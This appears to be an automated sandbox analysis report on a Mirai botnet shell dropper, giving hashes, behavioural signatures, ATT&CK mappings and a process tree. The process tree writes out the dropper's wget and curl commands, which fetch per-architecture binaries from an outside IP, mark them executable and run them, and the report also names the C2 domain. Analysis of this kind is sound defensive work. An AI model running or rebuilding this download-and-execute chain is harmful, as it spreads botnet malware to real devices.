mirai | dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31

Analysis

max time kernel
131s
max time network
149s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
12/03/2025, 03:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
Size

2KB
MD5

4f730f218d22e79270dd5af7df77d761
SHA1

59cfd55256c70085ab0110c9680057f16401e235
SHA256

dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31
SHA512

77f5348af4e4b4f549109be0e8fdc37ad0791ff4e262fb5c811d3508de9c21d54131ba09a6703269baff71b863a25c67a53441e9aefa130e289dc9fc6eccb4d6

Score

10^/10

mirai unstable botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

UNSTABLE

dasdv1.service1921.club

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1566	chmod
1493	chmod
1500	chmod
1519	chmod
1525	chmod
1531	chmod
1537	chmod
1549	chmod
1555	chmod
1506	chmod
1513	chmod
1543	chmod
1560	chmod

Deletes itself 1 IoCs

pid	Process
1494	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/WTH	1494	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH	1501	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH	1507	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH	1514	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH	1520	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH	1526	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH	1532	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH	1538	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH	1544	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH	1550	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH	1556	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH	1561	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH	1567	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
File opened for modification	/dev/misc/watchdog	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
File opened for modification	/bin/watchdog	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-1.dat	upx
behavioral1/files/fstream-4.dat	upx
behavioral1/files/fstream-5.dat	upx
behavioral1/files/fstream-6.dat	upx
behavioral1/files/fstream-7.dat	upx

Changes its process name 1 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	1494	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/exe	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
File opened for reading	/proc/self/maps	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1496	wget
1498	curl
1499	cat

Writes file to tmp directory 25 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/WTH	dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
File opened for modification	/tmp/EdiAf.mips	wget
File opened for modification	/tmp/EdiAf.mips	curl
File opened for modification	/tmp/EdiAf.mpsl	wget
File opened for modification	/tmp/EdiAf.arm6	wget
File opened for modification	/tmp/EdiAf.arm7	curl
File opened for modification	/tmp/EdiAf.i686	curl
File opened for modification	/tmp/EdiAf.arc	curl
File opened for modification	/tmp/EdiAf.x86	curl
File opened for modification	/tmp/EdiAf.mpsl	curl
File opened for modification	/tmp/EdiAf.arm5	wget
File opened for modification	/tmp/EdiAf.ppc	wget
File opened for modification	/tmp/EdiAf.m68k	wget
File opened for modification	/tmp/EdiAf.m68k	curl
File opened for modification	/tmp/EdiAf.spc	curl
File opened for modification	/tmp/EdiAf.arm6	curl
File opened for modification	/tmp/EdiAf.x86	wget
File opened for modification	/tmp/EdiAf.arm	curl
File opened for modification	/tmp/EdiAf.arm5	curl
File opened for modification	/tmp/EdiAf.ppc	curl
File opened for modification	/tmp/EdiAf.spc	wget
File opened for modification	/tmp/EdiAf.arm	wget
File opened for modification	/tmp/EdiAf.arm7	wget
File opened for modification	/tmp/EdiAf.sh4	wget
File opened for modification	/tmp/EdiAf.sh4	curl

/tmp/dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
1⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
- Reads runtime system information
- Writes file to tmp directory
PID:1477
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.x86
  2⤵
  - Writes file to tmp directory
  PID:1479
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.x86
  2⤵
  - Writes file to tmp directory
  PID:1491
- /bin/cat
  cat EdiAf.x86
  2⤵
  PID:1492
- /bin/chmod
  chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:1493
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1496
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1498
- /bin/cat
  cat EdiAf.mips
  2⤵
  - System Network Configuration Discovery
  PID:1499
- /bin/chmod
  chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.mips EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:1500
- /tmp/WTH
  ./WTH zte.selfrep
  2⤵
  PID:1501
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1503
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1504
- /bin/cat
  cat EdiAf.mpsl
  2⤵
  PID:1505
- /bin/chmod
  chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:1506
- /tmp/WTH
  ./WTH zte.selfrep
  2⤵
  PID:1507
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arm
  2⤵
  - Writes file to tmp directory
  PID:1509
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arm
  2⤵
  - Writes file to tmp directory
  PID:1511
- /bin/cat
  cat EdiAf.arm
  2⤵
  PID:1512
- /bin/chmod
  chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:1513
- /tmp/WTH
  ./WTH zte.selfrep
  2⤵
  PID:1514
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arm5
  2⤵
  - Writes file to tmp directory
  PID:1516
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arm5
  2⤵
  - Writes file to tmp directory
  PID:1517
- /bin/cat
  cat EdiAf.arm5
  2⤵
  PID:1518
- /bin/chmod
  chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:1519
- /tmp/WTH
  ./WTH zte.selfrep
  2⤵
  PID:1520
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arm6
  2⤵
  - Writes file to tmp directory
  PID:1522
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arm6
  2⤵
  - Writes file to tmp directory
  PID:1523
- /bin/cat
  cat EdiAf.arm6
  2⤵
  PID:1524
- /bin/chmod
  chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /tmp/WTH
  ./WTH zte.selfrep
  2⤵
  PID:1526
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arm7
  2⤵
  - Writes file to tmp directory
  PID:1528
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arm7
  2⤵
  - Writes file to tmp directory
  PID:1529
- /bin/cat
  cat EdiAf.arm7
  2⤵
  PID:1530
- /bin/chmod
  chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:1531
- /tmp/WTH
  ./WTH zte.selfrep
  2⤵
  PID:1532
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.ppc
  2⤵
  - Writes file to tmp directory
  PID:1534
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.ppc
  2⤵
  - Writes file to tmp directory
  PID:1535
- /bin/cat
  cat EdiAf.ppc
  2⤵
  PID:1536
- /bin/chmod
  chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:1537
- /tmp/WTH
  ./WTH zte.selfrep
  2⤵
  PID:1538
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.m68k
  2⤵
  - Writes file to tmp directory
  PID:1540
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.m68k
  2⤵
  - Writes file to tmp directory
  PID:1541
- /bin/cat
  cat EdiAf.m68k
  2⤵
  PID:1542
- /bin/chmod
  chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:1543
- /tmp/WTH
  ./WTH zte.selfrep
  2⤵
  PID:1544
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.spc
  2⤵
  - Writes file to tmp directory
  PID:1546
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.spc
  2⤵
  - Writes file to tmp directory
  PID:1547
- /bin/cat
  cat EdiAf.spc
  2⤵
  PID:1548
- /bin/chmod
  chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /tmp/WTH
  ./WTH zte.selfrep
  2⤵
  PID:1550
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.i686
  2⤵
  PID:1552
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.i686
  2⤵
  - Writes file to tmp directory
  PID:1553
- /bin/cat
  cat EdiAf.i686
  2⤵
  PID:1554
- /bin/chmod
  chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:1555
- /tmp/WTH
  ./WTH zte.selfrep
  2⤵
  PID:1556
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.sh4
  2⤵
  - Writes file to tmp directory
  PID:1557
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.sh4
  2⤵
  - Writes file to tmp directory
  PID:1558
- /bin/cat
  cat EdiAf.sh4
  2⤵
  PID:1559
- /bin/chmod
  chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:1560
- /tmp/WTH
  ./WTH zte.selfrep
  2⤵
  PID:1561
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arc
  2⤵
  PID:1563
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arc
  2⤵
  - Writes file to tmp directory
  PID:1564
- /bin/cat
  cat EdiAf.arc
  2⤵
  PID:1565
- /bin/chmod
  chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arc EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
  2⤵
  - File and Directory Permissions Modification
  PID:1566
- /tmp/WTH
  ./WTH zte.selfrep
  2⤵
  PID:1567

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/EdiAf.x86

Filesize
30KB

MD5
e932653d32b429c51de2046623fa71d2

SHA1
32ecc535e6cf6e99f105835d4a7cb75ef4cb233a

SHA256
87dd914f28847f21e680b74700b0b4b339eb8f301677b53b1dddf8ffa2f33612

SHA512
e284ce814a09b33a108507645c88845aa478e05d7925742e09f190f4c733630429e9f9460c76b9e3b6ec17eddc3110e8283e515891bcaea4ce0307509fbe84c2

Download Submit
/tmp/WTH

Filesize
33KB

MD5
029a7185777b7f885a6c3807e46b7365

SHA1
87372b0029b72446861c7b429e3ef1626c337218

SHA256
42c2075a2803b78355f68b9d651a7bd154e5b61f62418d84a3b4d064b5c68a7d

SHA512
4890cb74a283c03d790ffe4f2e5fbc06d82d5943773874c00c48171000cb21891720a57eb22e036cd2324e28b476a38f61c29f0d05d2949c2f4c8cdb971779a8

Download Submit
/tmp/WTH

Filesize
35KB

MD5
7327f58c0e15f6086301a81780e100dc

SHA1
292bb04ad4df407ac687ef1df1071659708bd3bb

SHA256
b9f12d8c72d2a2a7263e1a7c2947e3891212b3566aae1b873212c6031e02de4d

SHA512
4cc238acfd72556b2453f4d2880ccc3b2f00d0899c98a6b7eeee7cb139b242b318b8483b3bc70f96ca23934719f2152712d0efb8d9a1c950a0c98eed02452911

Download Submit
/tmp/WTH

Filesize
32KB

MD5
addb1cd662dd870b9b7ed5273d6fa76e

SHA1
6e12f9d5128a0de23d4b4b0dbfbefb91ff09dfc0

SHA256
cee6e1cc48f81462d1668be2c341d7cc84b24e20e1747be03ad7e296434bffe7

SHA512
28525de6add0d53f05e3c7c1e7d84927f40aee8c24d531216b6a77aa0f0a11fddd67b7f41b9eccc9b6692579a0c0f7453145480f7f8bacdd5d7ab13ffaad2d4f

Download Submit
/tmp/WTH

Filesize
21KB

MD5
a117b1b367633cb07f0795bd5f0c6f8f

SHA1
32bfac42c7134383c6381b94c0d75317fcb56d11

SHA256
40fe55ff37dfaa1eded6d4a0d28994f7eaa4f36c384676bf3587349390a800f0

SHA512
7e9e4ac7b911b44f40eb14f684bac76478e95085ac0cc393dac95fa312057e9c4f1a3508338098026bd1369179cccae91ca07092024201b3619fdc4401a25726

Download Submit
/tmp/WTH

Filesize
75KB

MD5
642dff628df548a6c458f004fd3b5aa1

SHA1
cfd38a2a7522ed9637978f6f2c6ba117d60a9ec7

SHA256
219f1a94474530ae2502631dabb897e1442ce2b535728f36e7eb5153ae2228ed

SHA512
dc4ae205c670da0ead108aa30eb7627fab0a11fe4c47ce2c66042f89ef0ba4f52792d8217d98852e0c471f071079bb76bc4b975e32a018e3a5eeceb98c33f851

Download Submit